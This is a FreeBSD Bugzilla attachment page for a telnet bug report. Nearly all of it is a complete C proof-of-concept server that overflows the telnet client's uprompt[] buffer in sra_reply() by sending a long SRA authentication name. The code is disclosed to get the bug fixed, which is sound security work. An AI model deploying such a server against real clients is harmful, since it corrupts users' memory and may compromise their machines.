FreeBSD Bugzilla – Attachment 240895 Details for
Bug 270263
telnet buffer overflow if server sends long TELQUAL_NAME for sra
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Help
|
New Account
|
Log In
Remember
[x]
|
Forgot Password
Login:
[x]
telnet server that overflows telnet's uprompt[] in sra_reply()
telnet17d.c (text/plain), 2.68 KB, created by
Robert Morris
on 2023-03-16 10:35:24 UTC
(
hide
)
Description:
telnet server that overflows telnet's uprompt[] in sra_reply()
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-03-16 10:35:24 UTC
Size:
2.68 KB
patch
obsolete
>#include <stdio.h> >#include <string.h> >#include <stdlib.h> >#include <unistd.h> >#include <sys/socket.h> >#include <sys/ioctl.h> >#include <netinet/in.h> >#include <sys/wait.h> >#include <sys/resource.h> >#include <arpa/inet.h> >#include <assert.h> >#include <ctype.h> >#include <fcntl.h> >#include <signal.h> > >unsigned long long aa[] = { >0x101010101000033ull, >0x101010101010001ull, >0x10101010100ull, >0x30300032ull, >0xcfcfull, >0xc1cfull, >}; >int aai; > >#define IAC 255 >#define DONT 254 >#define DO 253 >#define WONT 252 >#define WILL 251 >#define SB 250 >#define SE 240 > >#define OPT_TTYPE 24 >#define OPT_TSPEED 32 >#define OPT_LINEMODE 34 >#define OPT_XDISPLOC 35 >#define OPT_OLD_ENVIRON 36 >#define OPT_AUTHENTICATION 37 >#define OPT_ENCRYPT 38 >#define OPT_NEW_ENVIRON 39 >#define OPT_LFLOW 33 >#define OPT_NAWS 31 > >#define QUAL_IS 0 >#define QUAL_SEND 1 >#define QUAL_REPLY 2 >#define QUAL_NAME 3 > >int >main(){ > > struct sockaddr_in sin; > memset(&sin, 0, sizeof(sin)); > sin.sin_family = AF_INET; > sin.sin_port = htons(23); > > int ss = socket(AF_INET, SOCK_STREAM, 0); > int yes = 1; > setsockopt(ss, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)); > if(bind(ss, (struct sockaddr *)&sin, sizeof(sin)) < 0){ > perror("bind"); > exit(1); > } > listen(ss, 10); > > > memset(&sin, 0, sizeof(sin)); > socklen_t len = sizeof(sin); > printf("listening...\n"); > int s1 = accept(ss, (struct sockaddr *)&sin, &len); > if(s1 < 0){ > perror("accept"); > exit(1); > } > close(ss); > > { > sleep(1); > char buf[512]; > int n = read(s1, buf, sizeof(buf)); > } > > { > char buf[] = { > IAC, WILL, OPT_AUTHENTICATION, > IAC, WILL, OPT_TTYPE, > IAC, WILL, OPT_TSPEED, > IAC, WILL, OPT_LFLOW, > IAC, WILL, OPT_LINEMODE, > IAC, WILL, OPT_XDISPLOC, > IAC, WILL, OPT_NEW_ENVIRON, > IAC, WILL, OPT_OLD_ENVIRON, > IAC, WONT, OPT_ENCRYPT, > IAC, DO, OPT_AUTHENTICATION, > IAC, DO, OPT_TTYPE, > IAC, DO, OPT_TSPEED, > IAC, DO, OPT_LFLOW, > IAC, DO, OPT_LINEMODE, > IAC, DO, OPT_XDISPLOC, > IAC, DO, OPT_NEW_ENVIRON, > IAC, DO, OPT_OLD_ENVIRON, > IAC, DONT, OPT_ENCRYPT, > }; > write(s1, buf, sizeof(buf)); > } > > for(int iters = 0; iters < 2; iters++){ > char buf[256]; > memset(buf, '0', sizeof(buf)); > > *(long long *)(buf+3+0) ^= aa[aai++]; > *(long long *)(buf+3+8) ^= aa[aai++]; > *(long long *)(buf+sizeof(buf)-2-8) ^= aa[aai++]; > > buf[0] = (char)IAC; > buf[1] = (char)SB; > buf[2] = (char)OPT_AUTHENTICATION; > buf[4] = 6; // sra > buf[sizeof(buf)-2] = (char)IAC; > buf[sizeof(buf)-1] = (char)SE; > > if(write(s1, buf, sizeof(buf)) != sizeof(buf)) > perror("write"); > > { > char bbb[512]; > read(s1, buf, sizeof(bbb)); > } > } > > sleep(10); >}
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=240895">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 270263
: 240895